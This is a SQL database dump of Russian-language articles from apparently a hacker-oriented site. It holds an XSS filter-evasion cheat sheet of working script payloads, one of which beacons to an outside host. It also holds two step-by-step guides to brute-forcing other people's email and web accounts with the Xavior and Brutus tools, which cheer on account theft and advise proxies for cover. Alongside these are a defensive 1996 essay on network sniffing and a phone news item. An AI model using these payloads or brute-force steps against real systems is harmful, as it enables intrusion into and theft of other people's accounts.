/>сработать UTF-7 кодировке, если в<br />теле тегов, в первых 4kb текста,<br />встретится кириллица. Это связано с тем, что буквы национального<br />алфавита, как правило, имеют ASCII-<br />код более 127, а такие коды не могут<br />быть использованы в 7-битном UTF-7,<br />и потому браузер не сможет<br />интерпретировать страницу в этой кодировке.<br />Впрочем, последнее преимущество не<br />всегда очевидно. Дело в том, что<br />современные форумы очень<br />громоздки, и первые 4kb, как<br />правило, занимают блоки CSS и скриптов, и не содержат в себе тегов<br />с кириллицей. Таким образом, даже<br />если на странице присутствует<br />киррилица, это еще не означает, что<br />сайт не подвержен UTF-7 атаке.<br />Ссылки [1] Cross-site Scripting Overview, Microsoft, 2000. Перевод: Cross-site Scripting Краткий обзор [2] RFC-2152 UTF-7 P.S. В процессе написания статьи, ни один форум не пострадал. Автор не<br />несет ответственности за незаконное<br />использование материала статьи.","Использование UTF-7 в атаках класса XSS","gazeta/img_318044.png","1373273907","4");
INSERT INTO gazeta_article VALUES("75","22","Авторы: Algol, zFailure <br />Один из основных методов защиты<br />сайтов от XSS-уязвимостей - это<br />использование различных фильтров<br />на вводимые пользователем<br />символы. В данной заметке описаны<br />особенности синтаксиса HTML, позволяющие обходить эти фильтры.<br />Следует отметить, что XSS уязвимости<br />являются браузеро-зависимыми. Все<br />приведенные ниже примеры<br />тестировались в IE6. В других версиях<br />или в других браузерах, примеры могут и не работать. Например<br />символ обратного апострофа (`)<br />является ограничителем атрибутов<br />только в IE. Другие браузеры, такие<br />как Opera например, не считают этот<br />символ огрничителем. * Разделители атрибутов тега. Помимо пробела, можно<br />использовать символы: слеш(/),<br />табуляцию, перевод строки.<br />Разделитель можно опустить, если<br />предыдущий атрибут заключен в<br />кавычки. HTML <image/src="1.png"/alt="Подсказка"/ border="0"> <image src="1.png" alt="Подсказка" border="0"> <image src="1.png" alt="Подсказка" border="0"> <image src="1.png"alt="Подсказка"border="0"> * Ограничители атрибутов тега. Значения можно заключать в<br />кавычки (двойные и одинарные) и в<br />апострофы, а можно вообще не<br />ограничивать. HTML <image src="" alt="Моя подсказка" border="0"> <image src="" alt='Моя подсказка' border="0"> <image src="" alt=`Моя подсказка` border="0"> <image src="" alt=Подсказка border="0"> * Кодировки символов. Расшифровка символов в скрипте<br />происходит до его выполнения: HTML <img src=javascript:alert (&quot;ok&quot;)> <img src=javascript:alert(&#039;ok&# 039;)> <img src=&#106&#97&#118&#97&# 115&#99&#114&#105&#112&# 116&#58 &#97&#108&#101&#114&#116&# 40&#39&#111&#107&#39&#41> <a href=javascript:alert(%22ok%22) >click me</a> (только в атрибуте href) * Ограничители символьных<br />литералов в скриптах. HTML <img src=javascript:alert('ok')> <img src=javascript:alert("ok")> <img src=javascript:a=/ok/;alert (a.source)> <img src=javascript:alert (String.fromCharCode(111,107))> * Обход фильтрации некоторых<br />символов HTML <img src=javascript:i=new/**/Image() ;i.src='http://bla.bla'> (замена пробела на /**/) * Способы запуска скриптов.<br />Несколько способов<br />автоматического запуска скриптов: HTML <script>alert('ok')</script> <script src=1.js></script> <body onLoad=alert('ok')> <meta http-equiv=Refresh content=0;url=javascript:alert('ok')> <image src=1.png onload=alert('ok')> <image src=javascript:alert('ok')> <image src="" onerror=alert('ok')> <hr style=background:url (javascript:alert ('ok'))> <span style=top:expression(alert('ok')) ></span><br /><span sss="alert();this.sss=null" style=top:expression(eval(this.sss));></ span> (срабатывает только один раз) <style type="text/css">@import url (javascript:alert('ok'));</style> <object classid=clsid:ae24fdae-03c6-11d1-8b76- 0080c744f389><param name=url value=javascript:alert('ok')></object> <embed src=javascript:alert('ok') ;this.avi><br /><embed src=javascript:alert('ok') ;this.wav> <iframe src=javascript:alert('ok')> (только в IE) <a href=javascript:alert(%22ok%22) >click me</a> (запуск только при клике по<br />ссылке) <a href=javascript:alert('aaa'+eval('alert ();i=2+2')+'bbb')>click me</a> (запуск только при клике по ссылке) <br SIZE="&{alert('XSS')}"> (только Netscape 4.x) * Различные скриптовые<br />протоколы, способы их написания HTML <img src=javascript:alert()> <img src=vbscript:AleRt()> <img src=JaVasCriPt:alert()> <img src=" javascript:alert()"> (пробелы до слова javascript) <img src=&#106&#97&#118&#97&# 115&#99&#114&#105&#112&# 116:alert()> <img src=javascript&#9:alert()> <img src=javascript&#10:alert()> <img src=javascript&#13:alert()> <img src="javascript :alert()"> (перед двоеточием - символ табуляции) <img src="java scri pt:ale rt()"> (внутри слова javascript - символ табуляции и возврат каретки) * Вставки скриптов в style.<br />Операторы скрипта в атрибуте style<br />нужно разделять "\;". HTML <hr style=`background:url (javascript:alert ('ok 1')\;alert('ok 2'))`> * Специальные теги. HTML <image src="1.png" alt="" border="0"> (тег img и image работают<br />одинаково) <plaintext> (все, что будет идти после этого тега, будет восприниматься как<br />обычный текст - не HTML) <textarea> (все, что будет идти после этого тега, будет восприниматься как<br />обычный текст - не HTML) <xml> (все, что будет идти после этого тега, не будет отображаться) * Таблица часто применяемых<br />кодов: Text Символ Десятичная кодировка 16-ая<br />кодировка* Символьная кодировка<br />URL-кодировка<br />" &#34 &#x22; &quot %22<br />' &#39 &#x27; %27<br />` &#96 &#x60; %60 <пробел> &#32 &#x20; +<br /><табуляция> &#9 &#x09; %09<br /><возврат каретки> &#13 &#x0D; %0D<br />= &#61 &#x3D; %3D<br />< &#60 &#x3C; &lt %3C<br />> &#62 &#x3E; &gt %3E \ &#92 &#x5C; %5C<br />% &#37 &#x25; %25<br />+ &#43 &#x2B; %2B<br /><короткий дефис> &#173 &#xAD;<br />&shy %AD<br />& &#38 &#x26; &amp %26 *-в некоторых случаях точку с<br />запятой можно опустить (если символ<br />стоит в конце строки, или подряд<br />идут несколько символов в данной<br />кодировке).","XSS Особенности синтаксиса HTML","gazeta/img_259855.png","1373274086","4");
INSERT INTO gazeta_article VALUES("76","22","Взлом HTTP паролей с помощью<br />программы Xavior Автор: E1iT_c0rP5 Дата: 02-08-2000 13:22:42 Ну что же здарова кул-хакЁр!!!Ты<br />ещё не кул-хакер???Ты ещё не<br />натянул сервак www.whitehouse.gov??? Ты ещё даже не научился выкидывать ЛОМОВ из<br />чата??? Ну так что же, не беда, этому<br />ты научишься позже...<br />Вот задаёшься ты вопросом: как же<br />этот кул-хакер взломал твоё вэб<br />мыло и от твоего имени рассылает коников и вирей??? Ну ничего<br />сегодня мы тебе расскажем как это<br />делается самым простым способом.<br />Для этого тебе не понадобятся какие-<br />нибудь углубленные знания генной<br />инженерии и знания азбуки Морзе, а так же не понадобится понятие<br />принципа работы электронного<br />розгонятиля протонов в вакууме.<br />Ну так вот, сначала валишь на http:// guest.btinternet.com/~lithiumsoft/ xavior/Download.html и сливаем себе<br />рулезную прогу под названием Xavior<br />v1.0 Beta 7.Инсталим,там ничего<br />сложного и сверхъестественного, вот<br />у нас уже есть оружие начинающего<br />Хакера. Вот запустил ты енту прогу на своей<br />тачке и видишь уродство и говоришь<br />себе: "Блин что это за убожество,<br />отстой, ни картинок тебе, ни<br />нормального ХЕЛПА..." (у меня так и<br />было...=)Но всё пока ты не понимаешь ценности этой вещи. Ну<br />вот например я тебе напишу<br />неполный список того что ты<br />можешь сделать с помощью этой<br />проги:<br />1. подобрать пароль к мылу своего заклятого врага и поотсылать от его<br />мыла выря или лошадку(ну тока не<br />Прижевальского, ну да ты сам<br />знаешь...)<br />2. поломать ТЕХ. ПОДДЕРЖКУ своего<br />ПРОВА и раздобыть себе ХАЛЯВНЫЙ АККАУНТИК и делать далее усё что<br />твоей хацкерской душеньке угодно<br />(даже продать его=)<br />3. раздобыть себе АККАУНТИК к<br />ПОРНУШКЕ и даже если ты таким не<br />увлекаешься (может ты этакий КАЗАНОВА и на этих баб, тем более в<br />голом виде уже смотреть не можешь,<br />тошнит=), то есть много людей<br />готовых за такой АККАУНТИК сделать<br />ТтАаКкОоЕе!!!...уже проверенно...=)))<br />4. Ну и многое другое, надеюсь ты сам понимаешь...<br />Ну хорошо приступим к описанию<br />самой проги. Вот запустил ты её и<br />смотришь...а что же тут делать, а вот<br />сейчас я это и объясню...<br />Перед тобой менюшка с 6 закладками, о каждой по порядку:<br />1)Information-это закладка в которой<br />есть такие опции как:<br />* Usernames File-енто файл в котором<br />задаются ЛОГИНЫ<br />* Passes File-это файло в котром задаются ПАРОЛИ<br />* Currently Position Filename-это файл<br />с расширением *.xvp. Вот это и есть<br />хорошая фишка этой програмульки,<br />это значит что ты можешь долбать<br />спокойно какой-то мыл и в нём сложный пасс и требует долгого и<br />упорного долбления, а тут как раз<br />время ночной халявы кончается =).И<br />что делать ты думаешь, а ничего не<br />надо, будет всё снова начинать!!!<br />Прога запомнит позицию долбления и потом начнёт с неё.<br />* Далее идёт status, то есть online или<br />offline (где-то я уже это видел, вот<br />тока никак не припомню=).В правом<br />углу идёт усякая ИНФА типа номера<br />сессии, попыток в секунду, оставшееся время и т.п. Внизу есть 2<br />окна: первое-всякая инфа ненужная,<br />позиция долбинга (во как сказанул=)<br />,второе-окно это списки ЛОГИНОВ и<br />ПАССОВ которые прошли или<br />заканали...кто как называет. 2)закладка General Options-это<br />собственно говоря усе опции, а то<br />есть:<br />Target(Adress/IP) - ну это адресок<br />того, что собираемся долбить. Port-<br />это порт по которому долбится будем, по умолчанию 80(HTTP)<br />Directory/File (For WEB servers) - ну а<br />это папка на серваке куда долбится<br />будем, по умолчанию /secure<br />-Program to masqurade as...-это под<br />что прога шифруется Number оf Sesions-это кол-во сессий<br />Далее надо поставить галочку на<br />Auto Save Position every 100 attemps.<br />Потом идёт выбор куда же именно на<br />серваке долбится будем, то есть:<br />Standart HTTP basic Authentication - это стандартная проверка ЛОГИН\ПАССА<br />CGI-BIN/POST - это определение ПАССА<br />\ЛОГИНА по CGI и в ФОРМАХ<br />Scripting-это по скрипту<br />И вот последнее в этой закладке:<br />Checking Method-метод проверки=): Loop throught passwrds file once for<br />every user-это прыгать по ПАССАМ на 1<br />ЛОГИН,потом на 2 ЛОГИН и опять<br />прыжки по ПАССАМ<br />Make passwrd equal to username-это<br />как я понимаю прога берёт 1 пасс и прыгает по ЛОГИНАМ,вроде так<br />Brute Force all character combinations-<br />вот это самая рульная вещь,тобиш<br />БРУТ ФОРС или подбор по буквам<br />3) 3акладка Scripting-установки<br />скрипта. 4) 3акладка Mutators-это мутаторы с<br />помощью их можно например сказать<br />проге что-бы юзала ПАССЫ и ЛОГИНЫ<br />только в маленьких буквах.<br />5) 3акладка Brute Forcing-установки<br />БРУТ ФОРСА или наборы символов. 6) 3акладка Advanced - вот нужная в<br />натуре вещь, поподробней:<br />Use WWW Proxy-Web PROXY adress-Port<br />- ну енто использование ПРОКСИ<br />сервака, вещь архинужная и<br />архиважная! Но вот пока не могу понять почему же по умолчанию она<br />отключена %-Е<br />Sleep between multiple sessions... -<br />пока сам понять не могу нафига оно<br />надо...?<br />Minimize To Tray - без комментариев... Use timeouts - это время отдыха проги<br />между долбингом,советую<br />отключить вообще<br />Log Accepted Names/Passes to<br />"accepted.log"-енто записывать<br />удачные ЛОГИНЫ и ПАССЫ в этот файл.<br />Ну да ладно этой усей инфы,я лучше<br />расскажу всё на примере: вот<br />например есть ПРОВ и я знаю ЛОГИН<br />(если у юзверя есть мыло, то адрес до<br />@ и есть как всегда ЛОГИНОМ) и знаю что пасс у него состоит где-то из 6<br />знаков. Мутим раз - берём Melco$oft<br />Notepad-и пишем там ЛОГИН,<br />например superlamer, то бишь мыло у<br />него будет примерно такое: superlames@megaprov.com. Дальше берём любой генератор паролей и<br />задаём ему сгенерировать 1000<br />паролей с большими и маленькими<br />буквами и с цифрами...есть???<br />Молодец!!!<br />Мутим два - осталось настроить прогу и в путь!!! Значит ставим в проге тот<br />именно файл с ЛОГИНОМ который мы<br />там писали (superlamer),подставляем<br />файл с ПАССАМИ которые нам<br />добротно сгенерировала прога-<br />генератор паролей. Дальше ставим адрес, например www.users.superprov.com, отключаем таймаут, включаем прокси (даже<br />если у тебя уже стоит ПРОКСИ, всё<br />равно включи как говорится<br />"Оперативкой КОМП не испортишь!"=)<br />, ставим галочку на log<br />accepted...указываем файло для сохранения попыток, что-бы не<br />начинать при обрыве связи всё с<br />начала, и совсем забыл (БООТ сектор<br />у меня дырявый видно=) поставим<br />ГАЛКУ в закладке General Options на<br />Auto Save Posichion every 100 attempts!!!<br />Всё, ты готов к ворованию аккаунта.<br />Идём в меню Actions (это там вверху)<br />и жмём GO!!!<br />В заключении хочу сказать что если<br />усё сделано правильно, то должно получится... но надо помнить что<br />разные серваки построены на разный<br />ОС и это может и не заканать. И ещё<br />надо всегда помнить что: ЖАДНОСТЬ<br />ХАКЕРА СГУБИЛА!!! Так что вперёд к<br />новым барьерам (аккаунтам, мылам и т.п.)<br />Удачного тебе ХАКА мой маленький<br />электронный вор!!!=)","Программа Xavior","gazeta/img_326149.png","1373274378","4");
INSERT INTO gazeta_article VALUES("77","22","Как взломать чужую почту с<br />помощью программы Brutus AET2 Brutus AET2, написанная в январе<br />2000 года, является мощным<br />средством для перебора паролей на<br />WWW ресурсы, почту и с<br />использованием многих других<br />протоколов. С помощью этой программы также можно подбирать<br />пароли на шары, можно<br />поиздеваться над соседом, который<br />по ошибке поставил себе NetBus<br />server и забыл на него пароль:-)<br />Для тех, у кого на винте нет ни одного словаря, в чем я сильно<br />сомневаюсь, программа поможет<br />сгенерировать свой. Причем эту<br />возможность мы бы посоветовали<br />всем, даже тем, кто собирается<br />ломать пароли какой-либо другой программой. "Зачем?", спросите Вы. А<br />затем, что Вы вряд ли найдете где-<br />нибудь еще возможность создать<br />"мутирующий" словарь мегабайт на<br />30.<br />А если у Вас уже есть готовые словари, то с помощью этой<br />программы Вы сможете поудалять из<br />них дубликаты или преобразовать<br />словарь для Unix в словарь для<br />Windows. Заманчиво, не правда ли?!<br />Тогда слушайте дальше. Программа позволит Вам применять Брутфорс<br />(для любителей грубой физической<br />силы), что у нее получается довольно<br />неплохо.<br />Итак, обсудив некоторые общие<br />вопросы, переходим к частному, а именно к описанию функций Brutus<br />AET2.<br />...к частному. Функции программы в детальном<br />описании: - Menu Bar<br />Отсюда Вы будите сохранять и<br />загружать результаты уже<br />проделаннй работы.<br />Tools >> Wordlist Generation -<br />обращение к Wordlist Tools. С него-то и начнем.<br />Input list - имя используемого<br />словаря.<br />Output list - куда сохранить<br />результаты.<br />Функции меню: ~ Convert List (LF>CRLF) - конвертирует<br />текстовые файлы формата Unix в<br />текстовые файлы Dos формата.<br />~ Only Word Length - удаляет из<br />обозначенного Вами словаря в Input<br />list все слова, не соответствующие параметрам заданной длины.<br />~ Remove Duplicates - удаляет<br />дупликаты слов.<br />~ Permutations - удаляет слова,<br />которые можно получить путем<br />перестановки, к примеру: если в словаре имеется слово Pas, то Брутус<br />удалит из него слово sap и т.д.<br />~ Create New List - создание списка<br />Users/Passwords "из ничего". Как уже<br />было отмечено выше, это очень<br />полезная вещь. Определяем символы, которые могут быть<br />использованы в подбираемом пароле<br />или имени, минимальную и<br />максимальную длину и просим Брутус<br />создать словарь нажатием кнопки<br />Action. Если что-то не получилось, и словарь не создан, значит плохо<br />просили :-)))<br />Дальше больше...<br />- Target<br />Сюда необходимо ввести адрес цели.<br />xxx.xxx.xxx.xxx или буквами (в зависимости от того, что Вы знаете о<br />жертве, и то и дугое узнать не<br />трудно), например pop.mail.ru.<br />- Type<br />Выбираем, каким способом будет<br />происходить перебор паролей. Кроме стандартных http (basic auth), ftp,<br />pop3, telnet, smb и NetBus имеется<br />Custom - пожалуй наиболее сложная<br />часть Брутуса, представляющая собой<br />функцию "конфигурирования под<br />себя". Здесь можно самостоятельно установить время задержки, после<br />какого слова вводить user name,<br />после какого password etc.<br />Здесь хотелось бы отметить, что<br />Brutus AET2 не является программой<br />"для чайников" и ничего за Вас не сделает, если Вы не приложите к<br />этому руку. Использование этой<br />программы подразумевает наличия у<br />человека минимальных знаний и<br />выше. Поэтому, если это первая<br />программа, которую вы собираетесь использовать в своей ][-жизни,<br />отложите ее на время и почитайте<br />немного ][-Доков, никто Вас за это не<br />осудит.<br />- Connection Options<br />~ Port: ставится автоматически при использовании стандартных средств<br />подборки паролей.<br />~ Connections - максимальное число<br />одновременных соединений с<br />сервером.<br />~ Timeout - время ожидания ответа сервера на посланный запрос.<br />Чем больше Connections и Timeout,<br />тем медленнее идет процесс<br />перебора.<br />~ Proxy - используется для перебора<br />паролей к серверу через прокси. - Authentification Options<br />Здесь устанавливаем, что именно<br />необходимо подобрать. Это может<br />быть либо пароль из словаря с уже<br />известным user-name, либо<br />одновременный перебор User-name и Passwords по словарю. Up to You, как<br />говорится. Здесь же прописывается<br />путь к словарь, по которому будет<br />происходить перебор. Для<br />применения bruteforce атаки ставим<br />PassMode >> Bruteforce, что позволяет определить минимальную и<br />максимальную длину пароля, а<br />также, из каких символов он должен<br />состоять. В этом случае программа<br />будет сама генерировать пароли - без<br />какого-либо словаря. - Positive Authentification Results<br />Не трудно догадаться, что именно<br />здесь должны появляться<br />подобранные пароли и логины.<br />- Status Indication<br />Будет оповещать Вас о ходе процесса перебора, постоянно помигивая<br />одним из своих индикаторов. К<br />примеру, мигающий Timeout<br />означает, что данной функции было<br />поставлено слишком маленькое<br />значение и программа разорвала соединение с сервером, так и не<br />получив ответа. Небольшой пример Для взлома аккаунта на mail.ru<br />необходимо использовать<br />следующий алгаритм:<br />Сначала нам понадобится вордлист<br />(это файлик, где лежат часто<br />используемые пароли). Теперь нам надо узнать pop3 сервер<br />ломаемого мыла. Для этого идём<br />туда, где это мыло зарегано,<br />например, для мыла vasja@mail.ru мы пойдём на www.mail.ru, а для мыла petja@aport.ru мы пойдём на www.aport.ru =). Далее ищем раздел «Помощь», «Тех.поддержка» или<br />«FAQ», ищём раздел, где нам<br />предлагают настроить почтовые<br />программы (Outlook, The Bat),<br />выдёргиваем оттуда pop3 сервер (на<br />mail.ru pop.mail.ru). Вставляем этот pop3 в поле TARGET<br />нашего брутуса. В поле Type<br />выбираем, естественно, pop3.<br />Порт по умолчанию ставится 110 -<br />оставляем.<br />Connections - колличесиво попыток соединения.<br />Timeout – таймаут одного<br />соединения.<br />«Modify sequence» не трогаем, это для<br />хакеров ;)<br />Идём дальше. Итак, если мы ломаем конкретного человека, то ставим<br />галочку USE USERNAME и SINGLE USER,<br />вписываем в поле USERID имя<br />пользователя (у мыла vasja@mail.ru - это vasja, НО на разных серверах<br />может указываться по разному, это<br />смотрим тоже в хелпе по настройке<br />почтовых программ (см.выше)).<br />В поле PASS MODE выбираем «Word<br />list», и указываем путь к нашему ворд листу.<br />Наконец, нажимаем START и ждём<br />пароль =)<br />Для безопасности можно<br />использовать прокси, с этим проблем<br />думаю не возникнет.","Взлом почты","gazeta/img_704351.png","1373274497","4");
INSERT INTO gazeta_article VALUES("80","21","О проблеме защиты компьютерных сетей от несанкционированного доступа всегда охотно писали компьютерные издания и много говорили специалисты. Особенно актуальной эта тема становилась всякий раз, когда очередной хакер проникал в компьютерные системы Пентагона, NASA или крупного банка. Но, на мой взгляд, гораздо интересней то, что происходит у родного порога, т.е. как российские сети справляются с аналогичными проблемами. Одной из многочисленных попыток несанкционированного доступа к компьютерам российского сектора Internet посвящена эта статья. <br />В одном из докладов Министерства обороны США ("Information security - computer attacks at department of defence pose increasing risks"), составленных по запросу Конгресса, отмечалось, что в последнее время число атак на компьютеры вооруженных сил увеличилось: 250 тыс. атак в 1995 году, что в два раза превысило показатели 1994 года. В том же докладе отмечается, что, несмотря на все средства защиты, существующие в сети, только одна из 150 атак надежно обнаруживается.<br /> Среди основных средств, которыми пользуются атакующие, программа обмена электронной почтой sendmail, подбор паролей и сканирование трафика. Последний способ особенно неприятен, т.к. от него можно защищаться только шифрованием.<br />Надо сказать, что проблема защиты от сканирования далеко не нова. Со времен начала работы над проектом Athena Массачусетского технологического института, результатом которого явилась система "Керберос", одной из основных задач систем защиты информационного обмена в общественной сети стала защита от захвата и анализа пакетов.<br /> Пока вы спали...<br />До последнего времени в российском секторе Internet хотя и знали, что такая проблема существует, а провайдеры и сами пользовались сканированием, серьезных шагов по защите от сканирования не предпринималось, т.е. не выдвигалось требование тотальной защиты (как это имеет место во всех зарубежных коммерческих и правительственных сетях). Несмотря на то что Relcom первой продемонстрировала в 1991 году возможности бесконтрольного (со стороны государства) распространения информации через Internet, ни Demos, ни AO Relcom не ставили перед собой задачи сплошной защиты своих внутренних сетей от атаки извне при помощи средств просмотра содержания IP-пакетов. Надо сказать, что довольно долгое время такая практика себя оправдывала. Серьезных нарушений в работе сети не происходило, а атаки на шлюзы и локальные подсети успешно отбивались системами фильтрации трафика. Но к осени 1996 года ситуация изменилась. И, главным образом, по причине внедрения системы доступа к сети по dial-ip. Теперь в сети появилось множество случайных людей. Кроме того, внедрение Internet во многих московских вузах привело к тому, что в ряды пользователей Сети влилось немало студентов. При этом следует отметить, что доступ из академических и учебных заведений в Internet по большей части остается бесплатным для пользователей таких учреждений, а это значит, что ресурсами сети можно пользоваться круглосуточно, не заботясь о том, сколько у тебя в кармане денег. Люди, как известно, любят подсматривать и подглядывать. Ну а если заниматься этим сколько душе угодно, да еще и безнаказанно, то вероятность появления любопытных резко возрастает.<br />К осени 1996 года число зарегистрированных пользователей dial-ip составило несколько тысяч человек только в AO Relcom; Sovam Teleport начал предоставлять такой доступ на полгода раньше (с осени 1995), следовательно там пользователей должно быть еще больше. Кроме того, многие университеты, учебные заведения и научно-исследовательские организации для своих сотрудников создали модемные пулы. Естественно, что администраторы подсетей или их близкие друзья также не могли не воспользоваться возможностью работать на дому. Исходя из этого можно предположить, что только в Москве число пользователей dial-ip составляет несколько десятков тысяч человек. Совершенно очевидно, что среди такого количества людей обязательно найдется некто, посвятивший все свое свободное время исследованию сети, тем более, что слава всемогущих хакеров, взламывающих компьютеры Пентагона, многим не дает спать спокойно.<br /> Грозное предупреждение<br />В конце сентября 1996 года прозвучал первый тревожный звонок. При анализе статистики посещений сервера одного из московских провайдеров администратором в журнале программы фильтрации трафика была зарегистрирована очередная попытка несанкционированного доступа по реально существующему идентификатору и паролю. Учитывая, что таких попыток происходит довольно много, нужно отдать должное администратору системы, который оказался человеком дотошным и стал выяснять, кто и откуда пытался проникнуть в систему. Картина, возникшая в итоге двухнедельного изучения файлов отчетов статистики доступа к основным компьютерам центров управления российскими сетями, оказалась весьма удручающей. На многих машинах были выявлены посещения в режиме привилегированных пользователей с адресов, которые не ассоциировались ни с одним из тех лиц, которым такой доступ был разрешен. Обнаружились списки идентификаторов и паролей, инструмент, которым пользовались взломщики, отчеты этой программы - их злоумышленники хранили на компьютерах за пределами российской части Internet. В коллекции паролей и идентификаторов пользователей, в том числе и привилегированных только по российский части Internet, их насчитывается до нескольких тысяч.<br />Определить, кто и откуда коллекционировал информацию, не представляло большого труда. Сложнее было решить вопрос, что, собственно, в этом случае следует предпринимать. Ведь подобного прецедента в практике российского Internet-сообщества еще не было. Во-первых, конечно, надо было защищаться. Средства защиты хорошо известны - это фильтрация трафика и шифрация обменов. Благо в настоящее время Гостехкомиссией выдано более сотни лицензий на возможность проведения такого сорта мероприятий и сертифицировано как аппаратное, так и программное обеспечение. Лицензии имеют, например, такие компании как, "Анкей", "Элвис+", "Конфидент", "Релком-Альфа", и ряд других. Но пассивная оборона - это еще не все, хотелось, кроме того, и наказать наглецов. А вот это оказалось сделать сложнее. В принципе по новому российскому законодательству с января 1997 года предусмотрены наказания вплоть до лишения свободы на срок до семи лет за компьютерные преступления. Однако ведение следственных мероприятий, передача дела в суд и т.п. не входят в компетенцию провайдеров и могут занять много времени. Короче говоря, прецедентов что-то пока не наблюдалось. Поэтому было принято решение зафильтровать сетки, с которых осуществлялся первоначальный вход в сеть при взломе.<br />К чему привела эта практика, почувствовали на себе многие пользователи Сети. На первый взгляд, вроде ничего страшного, ну не пускают тебя к отечественным информационным ресурсам, а мы, что называется, и не хотели. Будем ходить на Запад. Но не тут-то было. Дело в том, что к отечественным информационным сервисам относится и служба DNS. DNS обслуживает запросы на получение по доменному имени машины ее IP-адреса. Каждый домен имеет несколько серверов, которые могут удовлетворить запрос пользователя, но только один из них является главным. Все остальные серверы время от времени сверяют информацию в своей базе данных с информацией в базе данных главного сервера. При фильтрации обычно закрывают порты TCP. Это значит, что отвечать на запросы, которые используют 53 порт UDP, сервер будет, а вот осуществить копирование описания зоны, которое производится по 53 порту TCP, на дублирующий сервер, межсетевой фильтр не даст. Как результат, дублирующие серверы будут отказывать в обслуживании, доступ к ресурсам, из-за невозможности получить за приемлемое время IP-адрес, будет затруднен. В результате обращаться к такому информационному ресурсу, как World Wide Web, становится весьма затруднительно. Что же говорить о доступе к отечественным ресурсам. Ведь "не видно" не только тех, кто спрятался за "стенами", но и тех, кто разместил там серверы DNS. Особенно пикантной становится ситуация, если в защищенную зону попадет root-сервер DNS для доменов SU и RU.<br />Понятно, что система рано или поздно стабилизируется. Обращения будут направляться только к "живым" серверам. Но, как показала практика, на это уходит около двух недель. Очевидно, что для того, чтобы избежать подобных "встрясок", провайдеры, к которым в данном случае относятся и некоммерческие сети, должны вместе договориться об общих принципах политики безопасности, в противном случае ситуация будет повторяться постоянно, но гораздо с более серьезными последствиями для всех заинтересованных сторон. Попутно хотелось бы заметить, что всякие разговоры о проблемах с сервером InfoArt (когда, как утверждалось, было подменено содержание базы данных службы доменных имен) могут являться следствием всего вышеизложенного. Хотя такое совпадение событий по времени может оказаться и простой случайностью.<br /> Пылесосы Internet<br />После столь долгого вступления давайте поговорим все же о том средстве, которым воспользовались злоумышленники. Программы, позволяющие захватывать пакеты из сети, называются sniffers (буквально - "нюхачи", но мне кажется, лучше назвать их "пылесосами", так как, хотя есть и интеллектуальные программы, которые из всех пакетов выбирают только то, что нужно, большинство из них "сосет" все подряд. Первые такие программы использовали топологию сетей Ethernet. В обычном режиме плата Ethernet принимает только те фреймы, которые ей предназначены, т.е. указаны в заголовке фрейма. Однако в целях отладки многие карты можно заставить работать в режиме "пылесоса", тогда они будут принимать все фреймы, которые передаются по кабелю. Такой режим работы карты называется promiscuous mode. Если можно заполучить пакет в машину, то, следовательно, его можно проанализировать. Главная проблема, связанная с "нюхачами", заключается в том, чтобы они успевали перерабатывать весь трафик, который проходит через интерфейс. Код одной из достаточно эффективных программ этого типа (Esniff) был опубликован в журнале Phrack. Esniff предназначена для работы в SunOs. Программа очень компактная и захватывает только первые 300 байт заголовка, что вполне достаточно для получения идентификатора и пароля telnet-сессии. Программа свободно распространяется по сети, и каждый желающий может "срисовать" ее по адресу: ftp://coombs.anu.edu.au/pub/net/log. Существуют и другие программы этого типа, и не только для платформ Sun. Это Gobler, ethdump, ethload для MS-DOS или Paketman, Interman, Etherman, Loadman - для целого ряда платформ, которые включают в себя и Alpha, Mips и др. "Нюхачи" существуют не только для Ethernet. Многие компании выпускают системы анализа трафика и для высокоскоростных линий передачи данных. Достаточно зайти на домашнюю страницу AltaVista и запустить запрос, состоящий из одного слова sniffer, как вы сразу получите целый список страниц на данную тему. Лучше, правда, использовать "sniffer AND security", т.к. система может понять вас буквально и выложить информацию и об органах дыхания. При этом следует подчеркнуть, что проблема "подглядывания" это не только проблема сетей TCP/IP. Существуют анализаторы любых протоколов, просто TCP/IP - это Internet.<br />Защищайтесь!<br />Когда писались программы анализа трафика, предполагалось, что пользоваться ими будут профессионалы, отвечающие за надежность работы сети. Однако, как это часто бывает, система оказалась обоюдоострой. Как же бороться с непрошенными гостями? Во-первых, если система многопользовательская, то при помощи команды ifconfig можно увидеть интерфейс, который работает в режиме "пылесоса". Среди флагов появляется значение PROMISC. Однако злоумышленник может подменить команду ifconfig, чтобы она не показывала этот режим работы. Поэтому сначала следует убедиться в том, что программа та самая, которая была первоначально, а затем ее необходимо протестировать. Обнаружить "пылесос" на других машинах сети нельзя, особенно это касается машин с MS-DOS. Поэтому защищаются от сканирования путем установки межсетевых фильтров и введения механизма шифрации либо всего трафика, либо только идентификаторов и паролей.<br />Существуют и аппаратные способы защиты. Ряд сетевых адаптеров не поддерживает режим promiscuous mode. Если эти карты использовать для организации локальной сети, то можно обезопасить себя от "подглядывания".<br />Для того чтобы "подглядывать", вовсе не обязательно включать режим принятия всех пакетов. Если запустить программу анализа пакетов на шлюзе, то вся информация также будет доступна, т.к. шлюз перепускает через себя все пакеты в/из локальной сети, для которой он выполняет функции маршрутизатора.<br />Увы, для пользования sniffer не надо иметь семи пядей во лбу, не нужен диплом о высшем образовании, да и вообще, запустить программу и воспользоваться результатами ее работы может младенец. То, что кто-то смог собрать коллекцию чужих паролей и идентификаторов, вовсе не свидетельство его ума или профессиональной пригодности. В нашем конкретном случае программа анализа дампа, которой пользовался хакер, была довольно малоэффективна (около 2%). В Сети существуют средства и получше.","Захват","gazeta/img_780623.png","1373279067","3");
INSERT INTO gazeta_article VALUES("93","20","41-мегапиксельный смартфон Nokia действительно вызывает неподдельный интерес.За несколько часов до анонса первого камерофона Nokia Lumia 1020 в сети появилась подробная информация о его характеристиках. Об основных мы знали ранее, сейчас же в интернет "утекли" абсолютно все спецификации новинки.<br /><br />Итак, Nokia Lumia 1020 имеет 4,5-дюймовый AMOLED PureMotion HD+ ClearBlack дисплей с разрешением 1280x768 пикселей, защищенный сверхпрочным стеклом Gorilla Glass 3. Специальный режим позволяет без труда читать информацию на солнце, а суперчувствительный экран распознает касания ногтей и пальцев в перчатках.<br /><br />Тут используется двухъядерный процессор Qualcomm Snapdragon с тактовой частотой 1,5 ГГц, 2 ГБ оперативной памяти и 32 ГБ встроенной. Карты памяти использовать нельзя, но зато есть бесплатные 7 ГБ в "облаке" SkyDrive.<br /><br />Новинка оснащена 41-мегапиксельной матрицей PureView с системой оптической стабилизации (OIS) и обратной подсветкой. Фотомодуль может похвастать 6-линзовой оптикой, 3-кратным зумом "высокого разрешения", автофокусом, ксеноновой вспышкой для фото и светодиодной подсветкой 